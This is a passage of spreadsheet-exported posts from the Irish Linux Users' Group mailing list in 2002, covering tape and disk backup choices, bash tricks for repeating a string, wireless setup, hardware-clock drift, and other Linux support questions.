List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Anyone know where in Ireland I can get a replacement external dongle
for a Xircom CE3B-100 PCMCIA NIC?Failing that, who delivers fastest to Ireland?Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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rackspace.Thanks,
Ciaran.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Ciaran Johnston [mailto:cj@nologic.org]
&gt; Sent: 16 August 2002 15:09
&gt; To: ilug@linux.ie
&gt; Subject: [ILUG] Backup solutions
&gt; 
&gt; Hi folks,
&gt; I maintain a colocated server on behalf of a small group of individuals,
&gt; and am looking at backup solutions. Is it possible to get some sort of
&gt; low-
&gt; end internal tape / other solution that could be used to back up approx.
&gt; 40
&gt; Gigs of data or am I just dreaming? My ISP does offer backups at extra
&gt;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&gt; part
&gt; of the charge for colocation is rackspace.
&gt; 
&gt; Thanks,
&gt; Ciaran.I'd recommend a good external DLT drive.
You will probably need a SCSI card for that too.Mmmm.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Use Amanda at http://www.amanda.org/Donncha.On Friday 16 August 2002 15:09, Ciaran Johnston wrote:
&gt; Hi folks,
&gt; I maintain a colocated server on behalf of a small group of individuals,
&gt; and am looking at backup solutions. Is it possible to get some sort of low-
&gt; end internal tape / other solution that could be used to back up approx. 40
&gt; Gigs of data or am I just dreaming? My ISP does offer backups at extra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part
&gt; of the charge for colocation is rackspace.
&gt;
&gt; Thanks,
&gt; Ciaran.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Brian ODonoghue said:
&gt;
&gt;
&gt;&gt; -----Original Message-----
&gt;&gt; From: Ciaran Johnston [mailto:cj@nologic.org]
&gt;&gt; Sent: 16 August 2002 15:09
&gt;&gt; To: ilug@linux.ie
&gt;&gt; Subject: [ILUG] Backup solutions
&gt;&gt;
&gt;&gt; Hi folks,
&gt;&gt; I maintain a colocated server on behalf of a small group of
&gt;&gt; individuals, and am looking at backup solutions. Is it possible to get
&gt;&gt; some sort of low-
&gt;&gt; end internal tape / other solution that could be used to back up
&gt;&gt; approx. 40
&gt;&gt; Gigs of data or am I just dreaming? My ISP does offer backups at extra
&gt;&gt; cost
&gt;&gt; but the only problem with that is, well, the extra cost.
&gt;&gt;
&gt;&gt; What I was hoping to do was to install some kind of internal tape
&gt;&gt; device, then swap tapes round every month, so I had an onsite backup
&gt;&gt; of say the last 24 hours and an offsite backup of the last month. Is
&gt;&gt; this feasible? I'm beginning to think it isn't. External devices are
&gt;&gt; not an option as part
&gt;&gt; of the charge for colocation is rackspace.
&gt;&gt;
&gt;&gt; Thanks,
&gt;&gt; Ciaran.
&gt;
&gt; I'd recommend a good external DLT drive.
&gt; You will probably need a SCSI card for that too.Yeah, so would I, but as I said, external ain't really an option./Ciaran.&gt;
&gt; Mmmm.
&gt;
&gt; --
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
&gt; information. List maintainer: listmaster@linux.ie
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Thanks for the tips. The closest I've gotten to getting it working is
Justins script except I can seem to prevent it from following links
offsite.Typical, something that should only take a minute...Thanks for you help.ct-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>DDS-4 will hold 40 GB, media is about 42 (ex vat)euros per tape
HP do DDS-4 backup tape drives to take those but they're
about 1236 euros (ex vat) and thats for an internal model (taken from
DCB Groups catalogue). There are other brands and various
other tape formats to choose from, but just to give you a rough
benchmark of pricing for that sorta capacity.Ther are options that will go up to crazy capacities by using
using multiple tapes in a caddy... of course its gonna cost
a lot more.I'd also be ensuring I had some sort of disk mirroring set up
also... the more redundancy the better (within reason).G.___________________________
 Graham Smith,
 Network Administrator,
 Department of Computing,
 Institute of Technology,
 Tallaght, Dublin 24
 Phone: + 353 (01) 4042840-----Original Message-----
From: Ciaran Johnston [mailto:cj@nologic.org]
Sent: 16 August 2002 15:09
To: ilug@linux.ie
Subject: [ILUG] Backup solutions
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rackspace.Thanks,
Ciaran.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
As far as I know, there are ide add-in cards that support hot-plugging of
drives, not too sure if this feature is availabe on the cheaper
promise/highpoint controllers, but it is definitely available on the
higher-end (true ide-raid) cards.Cathal.On Fri, 16 Aug 2002, Ciaran Johnston wrote:&gt; Vincent Cunniffe said:
&gt; &gt; I run several co-located servers, and the solution I have adopted is
&gt; &gt; IDE drives. They're cheap, fast, and you don't have to keep buying
&gt; &gt; media for them. Combine it with a removable HD caddy from Peats or
&gt; &gt; Maplins, and you have a complete onsite/offsite backup solution with 4
&gt; &gt; entire generations of data for about â‚¬250 (2 * 80GB/5400 drives and a
&gt; &gt; caddy for the server).
&gt; &gt;
&gt; &gt; You do need 60 seconds of downtime to replace the drive, but that's
&gt; &gt; pretty trivial if done once per month.
&gt;
&gt; Hmmm... this does sound interesting. I think it may be the way to go... I'd
&gt; still be interested in hearing people's opinions on the tape drives I
&gt; mentioned, though, esp. wrt. this solution. I know knocking a drive around
&gt; doesn't do it any good.
&gt;
&gt; /Ciaran.
&gt;
&gt;
&gt;
&gt;
&gt;
&gt;-- 
Cathal Ferris.			pio@skynet.ie
+353 87 9852077			www.csn.ul.ie/~pio
---
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1OkWell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thishttp://www.roaringpenguin.com/pppoe/how-to-connect.txt
http://www.roaringpenguin.com/pppoe/And they look very cool for the beginner. Also the is a cool article
on www.linux.ie about USB and ADSL with PPPoE on Linux. ANyhow when I
do get it working (either with the 645 MMMMM or something else) I
will put up a howto but really the above is quite cool.Aj- ----------------------------------------
AJ McKee
NMTB mediaPhone: (Europe) +353 1 473 53 72
       (North America) +1 206 339 4326Fax:   (Europe) +353 1 473 53 73
       (North America) +1 206 339 4326Website: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&gt;-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use 
Comment: PGP/GPG Keys located at http://www.nmtbmedia.com/keys/iQA/AwUBPV1dFIHmA/TOOP95EQL/kgCg8Ge94omOuirLYokN1UauZzApHEQAn0In
6r/o13G+0YEgjlc/XDwQOUN1
=yGuw
-----END PGP SIGNATURE------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hey there,
Im using the standard ADSL package
With the speedtouch usb modemI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nicely.Once the machine is configured for adsl  (thats the tough bit)
the network stuff is quite easy.I found that to be the simpelst way to go.
-- Redbrick - Dublin City University Networking Society
Declan McMullen - Education Officer
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hello JustinThe simplest setup would be to connect a wireless access point to you
hub then use a wireless pcmcia network card in your laptop.  You could
also get some pcmcia to pci adapters or wireless pci network cards for
your desktop machines.The access point would be configured with a network name (essid) and a
channel number for you wireless network.  The client machine would be
configured with the same network name, it should be able to auto detect
the channel number.Driver support is very good, there are only a few wireless chipsets,
and I believe that all but the newest 802.11b Plus (22Mbps) and 802.11a
hardware has Linux drivers.If you need anymore help or info checkout the forums and irc channel at
.Robert Fitzsimons
robfitz@273k.netOn Fri, Aug 16, 2002 at 05:39:21PM +0100, Justin MacCarthy wrote:
&gt; I have a small network at home,
&gt; 
&gt; Connected by 5 port hub....
&gt; "smoothwall" smoothwall server  	192.168.1.1
&gt; "shaftoe" 	Windows 2000		192.168.1.75
&gt; "gotodengo"	Linux				192.168.1.50
&gt; 
&gt; 
&gt; The family has a new pc I want to plug in, to use the ISDN in smoothwall.
&gt; I also have a notebook.
&gt; 
&gt; 
&gt; I want to plug both of these into the network using a wireless connection.
&gt; What's the best way to do this??? I need to plug a wireless hub into my 5
&gt; port hub; right? What wireless hardware is good for both Linux &amp; windows???
&gt; I'm know very little about wireless...
&gt; 
&gt; Thanks
&gt; 
&gt; Justin
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Quoting Ciaran Johnston (cj@nologic.org):&gt; Thanks for all the replies.
&gt; 
&gt; I see from
&gt; http://www.sosonline.co.uk/Shop/Product_Details.asp?DP=1215&amp;RP=0 that
&gt; I can get a Seagate internal DDS-4 capable drive for Euro1,018.43.
&gt; This is about the limit of my spending. However, this OnStream IDE
&gt; tape drive - http://web6.scan.co.uk/Products/Info.asp?WPID=14022
&gt; (thanks for the link, Martin) - by my calculations provides more
&gt; storage at only slightly slower speeds at half the price. Is there any
&gt; overriding reason why I should go with the more expensive and
&gt; lower-capacity DDS-4 drive other than speed?The ADR (Advanced Digital Recording) tape format is an interesting
option, one I hadn't seen much of, before.  Look as if OnStream (spun
off from Philips Electronics in 1998) invented and rather tightly
control the format, though other companies such as Verbatim do make
compatible media under licence.If you're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helical-scan
systems -- which ADR turns out _not_ to be), and somehow that always
ends up being cheaper for tape technologies in which there is heavy
competition.The less-tangible consideration that comes most immediately to mind is
that, if one's OnStream ADR drive fails, the only possible replacement
that would suffice to restore your accumulated backup sets is another 
OnStream ADR drive.  In that sense, you're somewhat locked in:  I'm 
not seeing ADR drives from anyone else (though I might have missed
them).  If OnStream are smart, they've priced the drives to attract people into
the system, and are making up the shortfall on media cost after they 
get people to buy in.   I see the following prices for mail order 
(http://www.finnsoft.com/priclist/verbat.htm) of Verbatim-brand tapes:42 euros for 30 GB ADR tape
33 euros for 30 GB ADR tape, four-pack.
66 euros for 50 GB ADR tape.
44 euros for 50 GB ADR tape, four-pack.
47 euros for ADR cleaning tape.(You don't get much lower pricing than Verbatim, without going no-name.)Capacities are usually quoted on the basis of a nominal 2:1 compression
ratio.  The PDF datasheet for Onstream's "ADR2" series says this is a
linear-serpentine recording technology (a good thing) like DLT, SDLT,
and LTO, rather than a helical-scan method typified by DDS/DAT, AIT, and
8mm (which puts heavy wear on tapes on heads).I'm not sure what software other than NovaStor's TapeCopy and Yosemite
Technology's Tapeware will support OnStream's drives.  My recollection
is that BRU will do it.On balance, I'd personally _still_ go with a DDS4 drive using either DDS3
or DDS4 media, mostly because once you've survived life with one
oddball, less-standard tape format, you're not in a hurry to repeat the
experience.  But ADR does seem at a quick glance to be well designed,
and might be a good bet after all.  As they say in the gaming industry,
"Ya pays your money, and ya takes your chances."-- 
"Is it not the beauty of an asynchronous form of discussion that one can go and 
make cups of tea, floss the cat, fluff the geraniums, open the kitchen window 
and scream out it with operatic force, volume, and decorum, and then return to 
the vexed glowing letters calmer of mind and soul?" -- The Cube, forum3000.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
On Pungenday, the 9th day of Bureaucracy, Padraig Brady confessed:
&gt; How can I repeat a string an arbitrary number
&gt; of times in bash/sed/...
&gt;
&gt; I.E. I'm missing the repeat in the following:
&gt;
&gt; STRING="&gt; "
&gt; NUMBER=3
&gt; PREFIX=repeat $STRING $NUMBER
&gt; echo $PREFIX
&gt; &gt; &gt; &gt;
perl ?  STRING="&gt; "
  NUMBER=3
  PREFIX=`perl -e "print '$STRING' x $NUMBER;"`
  echo $PREFIXI'm pretty sure the bsd 'jot' utility can do this too, but I don't
have it to hand.-kev-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Just wondering if anyone has implemented one before, and any suggestions 
etc.Yes i am googling, but would like some experienced opinion if available ;)Gavin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi all,
      I have an ISA PNP card that will use io 0x200 if available.  If located at
0x200 the card never works, at 0x210 it always does.  I suspect the problem is
the soundcard (Creative SB PCI-64) gameport controller, which also seems to live
here.  I'm not using the controller, so it doesn't show in /proc/ioports, so
autodetect happily puts my ISA card there.
      I can get the card to work easily enough using isapnptools, banning the
0x200 range in /etc/isapnp.gone, and then using "insmod radio-cadet io=0x210",
but I'd like to get the autodetect working, so what I think I'm looking for is
some way of adding "don't go here, don't bother me" entries into /proc/ioports.Anybody?TIA,
Ronan.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Kevin O' Riordan's [kor@compsoc.com] 30 lines of wisdom included:
&gt; 
&gt; On Pungenday, the 9th day of Bureaucracy, Padraig Brady confessed:
&gt; &gt; How can I repeat a string an arbitrary number
&gt; &gt; of times in bash/sed/...
&gt; &gt;
&gt; &gt; I.E. I'm missing the repeat in the following:
&gt; &gt;
&gt; &gt; STRING="&gt; "
&gt; &gt; NUMBER=3
&gt; &gt; PREFIX=repeat $STRING $NUMBER
&gt; &gt; echo $PREFIX
&gt; &gt; &gt; &gt; &gt;
&gt; 
&gt; 
&gt; perl ?
&gt; 
&gt;   STRING="&gt; "
&gt;   NUMBER=3
&gt;   PREFIX=`perl -e "print '$STRING' x $NUMBER;"`
&gt;   echo $PREFIX
&gt; 
&gt; I'm pretty sure the bsd 'jot' utility can do this too, but I don't
&gt; have it to hand.I didn't think that jot was installed on Linux systems by default,
so from the tone of Padraigs mail that's not what he wanted,
however, if I'm incorrect (don't have a Linux system to hand) the
following is the syntax.jot -b "string" 3Phil.
-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Sorry i know this is off topic:Ive recently gotton my hands on a mod chip for my PS2 and its needs to be
solderd into the PS2, but i have never solderd before and the guy i got it
off reccomended that i do not attempt to install it my self... if anyone can
do it or knows someone who can e-mail me at kiall@redpie.com. DO NOT REPLY
TO THIS LIST... once again sorry for the OT...Kiall Mac Innes-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Regarding:
Another problem I have is that I cannot install my ISDN, USB modem ( LASAT Speed Basic ), however im pretty sure its not supported by Linux, but again it is featured in the Hardware Browser, without installed drivers.Thanks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).It could well be my inexperience with Linux that is making this more difficult, but whatever it is iv just about had enough!! Any last gasp ideas would be welcomeMany ThanksMark-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Thanks to all for the responses,
more comments below...Niall O Broin wrote:
&gt; On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
&gt; 
&gt; 
&gt;&gt;How can I repeat a string an arbitrary number
&gt;&gt;of times in bash/sed/...
&gt;&gt;
&gt;&gt;I.E. I'm missing the repeat in the following:
&gt;&gt;
&gt;&gt;STRING="&gt; "
&gt;&gt;NUMBER=3
&gt;&gt;PREFIX=repeat $STRING $NUMBER
&gt;&gt;echo $PREFIX
&gt;&gt;
&gt;&gt;PÃ¡draig.
&gt;&gt;p.s. I know how to do it with loops.
&gt; 
&gt; 
&gt; Well, here's a solution using seq and sed - IMHO its a rather dim solution
&gt; and it definitely dies if STRING contains / (and probably has other ways to
&gt; die too) and a bash loop would certainly be faster, but you know how to do
&gt; it with loops :-)
&gt; 
&gt; PREFIX=seq -s "" $NUMBER|sed "s/./$STRING/g"_x001B_OAclever. A bit more robust is:
#first param is number of
#times to repeat second param
#
#e.g. quote=`repeat 3 '&gt; '`
repeat() {
     seq -s , $1 | sed "sÂ¬[0-9]\{1,\}[,]*Â¬$2Â¬g"
}btw loops in bash are shit slow! see:
http://www.iol.ie/~padraiga/readline/&gt; And while we're on silly bash questions, is there a way of getting the exit
&gt; status of a command without using $? i.e. can I do something like
&gt; 
&gt; result = some_magic_way_of_quoting(command)
&gt; 
&gt; instead of
&gt; 
&gt; command
&gt; result=$?
&gt; 
&gt; Note that I'm not looking for backtick or $() substitution, nor arithmetic
&gt; evaluation as with $[]I don't think this is possible.thanks,
PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve"> I've a solaris box &amp; a windows 2000 box, both with DLT drives, controlled
by Veritas Backup. Can I install some sort of client on the linux box to enable it to be
backed up ? A browse of the Veritas site is a little quiet on this front.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
&gt; &gt; On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
&gt; &gt;&gt;How can I repeat a string an arbitrary number
&gt; &gt;&gt;of times in bash/sed/...
&gt; &gt;&gt;
&gt; &gt;&gt;I.E. I'm missing the repeat in the following:
&gt; &gt;&gt;
&gt; &gt;&gt;STRING="&gt; "
&gt; &gt;&gt;NUMBER=3
&gt; &gt;&gt;PREFIX=repeat $STRING $NUMBER
&gt; &gt;&gt;echo $PREFIXhuh?  i missed all this.  do you want the string all on one line?the string repeated over and over, but with linebreaks in between,
this works:    yes "$STRING" | head -"$NUMBER"use sed to remove the newline i guess if you want.  the utilities yes,
head and sed are on pretty much every unix.kevin-- 
kevin@suberic.net     that a believer is happier than a skeptic is no more to
fork()'ed on 37058400    the point than the fact that a drunken man is happier
meatspace place: home       than a sober one. the happiness of credulity is a
http://ie.suberic.net/~kevin   cheap &amp; dangerous quality -- g.b. shaw-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>kevin lyda wrote:
&gt; On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
&gt; 
&gt;&gt;&gt;On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
&gt;&gt;&gt;
&gt;&gt;&gt;&gt;How can I repeat a string an arbitrary number
&gt;&gt;&gt;&gt;of times in bash/sed/...
&gt;&gt;&gt;&gt;
&gt;&gt;&gt;&gt;I.E. I'm missing the repeat in the following:
&gt;&gt;&gt;&gt;
&gt;&gt;&gt;&gt;STRING="&gt; "
&gt;&gt;&gt;&gt;NUMBER=3
&gt;&gt;&gt;&gt;PREFIX=repeat $STRING $NUMBER
&gt;&gt;&gt;&gt;echo $PREFIX
&gt;&gt;&gt;
&gt; 
&gt; huh?  i missed all this.  do you want the string all on one line?
&gt; 
&gt; the string repeated over and over, but with linebreaks in between,
&gt; this works:
&gt; 
&gt;     yes "$STRING" | head -"$NUMBER"
&gt; 
&gt; use sed to remove the newline i guess if you want.  the utilities yes,
&gt; head and sed are on pretty much every unix.Good. I actually looking at `yes` but I was in
slow mode on Friday and didn't consider combining with `head`To remove newlines then handiest is: tr -d '\n'thanks,
PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Yes indeed - there should be an agents directory on the Veritas CD - in
the unix subdirectory there should be a file called be_agnt.tar which
needs to be installed and configured.  I am not sure - but I think that
you may need to purchase a serial number in order to get this to work..Fergal.&gt; -----Original Message-----
&gt; From: John P. Looney [mailto:valen@tuatha.org] 
&gt; Sent: 19 August 2002 10:34
&gt; To: Irish LUG list
&gt; Subject: [ILUG] veritas backup on linux ?
&gt; 
&gt; 
&gt;  I've a solaris box &amp; a windows 2000 box, both with DLT 
&gt; drives, controlled by Veritas Backup.
&gt; 
&gt;  Can I install some sort of client on the linux box to enable 
&gt; it to be backed up ? A browse of the Veritas site is a little 
&gt; quiet on this front.
&gt; 
&gt; Kate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</si>
  <si>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 xml:space="preserve">
Lets say we have an nfs server with nfsd running really high load. nfsstat
will tell you roughly how much traffic is going through with access,
getattr with either client or server but it won't tell you who is doing
it. Is there any way on server side to determine what client is causing
the most usage, and on the client side, is there a way to determine which
process?-- 
Mel Gorman
MSc Student, University of Limerick
http://www.csn.ul.ie/~mel
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi All,Just wondering if anyone has ever installed StarOffice
6.0 (or Open Office), and if any have experienced any
problems with the install freezing ?I'm using RedHat 7.3 kernel 2.4.18-3, and glibc 2.2.5
?I might try downloading OpenOffice instead if it is
unresolved!!!!Cheers all,Colin
__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hello,
I've got a small problem but still annoying. I upgraded from RH 7.1 to 
RH 7.3 and everything looks ok except that the time is ahead by one 
hour. I've been looking the man files for hwclock and options but it 
simply doesn't work, it gives the following error from he shell as well 
as from the startup while loading the kernel:  hwclock: ioctl() to 
/dev/rtc to turn on update interrupts failed unexpectedly, errno=25: 
Inappropriate ioctl for device.
.... my solution at the time is to enter the setup of the PC and reduce 
the time by one hour (awful!)
Regards,
Felipe
PRL, DCU-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Mon, Aug 19, 2002 at 11:50:25AM +0100, Colin Nevin wrote:
&gt; Hi All,
&gt; 
&gt; Just wondering if anyone has ever installed StarOffice
&gt; 6.0 (or Open Office), and if any have experienced any
&gt; problems with the install freezing ?Maybe give us some more information about your hardware.If you happen to be using an S3 Savage graphics card (as used in
the IBM Thinkpad T20 and probably others) and you get strange display
problems plus the freezing problem then set this environment variable:
  SAL_DO_NOT_USE_INVERT50=true
You will need this environment variable set when running soffice,
so you should add an export line to your .bashrc.Hope this helps,David-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Niall O Broin wrote:
&gt; On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
&gt; 
&gt; 
&gt;&gt;&gt;Well, here's a solution using seq and sed - IMHO its a rather dim solution
&gt;&gt;&gt;and it definitely dies if STRING contains / (and probably has other ways to
&gt;&gt;&gt;die too) and a bash loop would certainly be faster, but you know how to do
&gt;&gt;&gt;it with loops :-)
&gt;&gt;&gt;
&gt;&gt;&gt;PREFIX=seq -s "" $NUMBER|sed "s/./$STRING/g"_x001B_OA
&gt;&gt;
&gt;&gt;clever. A bit more robust is:
&gt;&gt;#first param is number of
&gt;&gt;#times to repeat second param
&gt;&gt;#
&gt;&gt;#e.g. quote=`repeat 3 '&gt; '`
&gt;&gt;repeat() {
&gt;&gt;    seq -s , $1 | sed "sÂ¬[0-9]\{1,\}[,]*Â¬$2Â¬g"
&gt;&gt;}
&gt; 
&gt; But it's such a crap colution anyway, why would you want to make it more
&gt; robust ?
&gt; Give yourself credit :-) it's a nice solution,
with just 2 lightweight processes. The same thing
coded in shell loops wouldn't be nearly as elegant
and not as scalable to boot.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002, Vincent Cunniffe wrote:&gt; The process list initially shows a single main process :
&gt; 
&gt;    16877  1.0  0.2  1824  540 pts/1    S    17:14   0:00 ./heartbeat2
&gt; 
&gt; When the client runs, connects, and sleeps for 5 seconds :
&gt; 
&gt;    16877  0.0  0.2 10024  604 pts/1    S    17:14   0:00 ./heartbeat2
&gt;    16887  0.5  0.2  1796  720 pts/1    S    17:15   0:00 ./client
&gt;    16888  0.0  0.2 10024  604 pts/1    S    17:15   0:00 ./heartbeat2
&gt;    16889  0.0  0.0     0    0 pts/1    Z    17:15   0:00 [heartbeat2 
&gt; ]
&gt; 
&gt; When the client exits, and the thread should finish, it doesn't :
&gt; 
&gt;    16877  0.0  0.2 10024  604 pts/1    S    17:14   0:00 ./heartbeat2
&gt;    16888  0.0  0.2 10024  604 pts/1    S    17:15   0:00 ./heartbeat2
&gt; 
&gt; This second thread never goes away, but no more threads accumulate,
&gt; and the total memory consumption rises by about 8-9MB every single
&gt; time a client connects.
&gt; 
&gt; C++ bug, linux bug, pthreads bug, coding error?hmm... with pthreads there is always one thread which acts as a 
'thread manager'. do the number of processes accumulate? or is it 
just that the # of threads is == # of threads you're expecting + 1? 
if the latter, ttbomk that is normal.ie, you dont create the thread until the accept() returns. so up 
until then its a normal programme (ie no thread manager). after that 
you will always have +1 processes (for the thread manager).also, the stack for further threads is allocated from the heap. (see
sigaltstack() ) possibly glibc does not brk() back the space, just
like malloc()/free() does not always release the space to the heap
again (as most programmes will allocate memory / threads again
soonish anyway).&gt; Regards,
&gt; 
&gt; Vinregards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
The Official Colorado State Vegetable is now the "state legislator".-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; will have problems though if you use Windows, as it will tell wrong time
&gt; for half the year, and will reset the clock when you boot into it after
&gt; the change in time (this might be fixed in XP/2000, I don't know).
&gt; Even if you set the hwclock to localtime, you will get problems when you
&gt; boot into windows, as both Linux and Windows will try to alter the
&gt; hwclock (maybe there is a way to suppress windows doing this).
&gt; mHi there,I recently delved into how the linux system clock and the hardware clock
interact with each other when I set up ntp on my system while connected
to the net. However, I didn't realise that Windows altered the hw clock
as there was no mention of it in any of the docs I read. 
I still dual-boot on a regular basis and if Windows is sneakily messing
with the clock, I'd be interested to know in what way it is and how it
couild be stopped from doing so. Everything seems to work fine since I
set the system up but I still don't like to have these gaps in my
knowledge.Regards,
Anthony Geoghegan
-- 
The worst sin towards our fellow creatures is not to hate them,
but to be indifferent to them. That is the essence of inhumanity
 - George Bernard Shaw-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:
&gt; to the net. However, I didn't realise that Windows altered the hw clock
&gt; as there was no mention of it in any of the docs I read. 
&gt; I still dual-boot on a regular basis and if Windows is sneakily messing
&gt; with the clock, I'd be interested to know in what way it is and how it
&gt; couild be stopped from doing so.
In my experience Windows will change the hardware clock the first time
you boot into it after the clocks have gone forward/back an hour.  This
will only happen twice a year. How to stop it, I have not checked (I
just switch the clock back an hour from within windows after such a
reboot).  Is there a GMT windows timezone?With ntp, it is a big no-no (afaik) to have other programs messing with
the clock as it will put ntp's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aren't exactly).
m
-- 
Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:
&gt;&gt; to the net. However, I didn't realise that Windows altered the hw clock
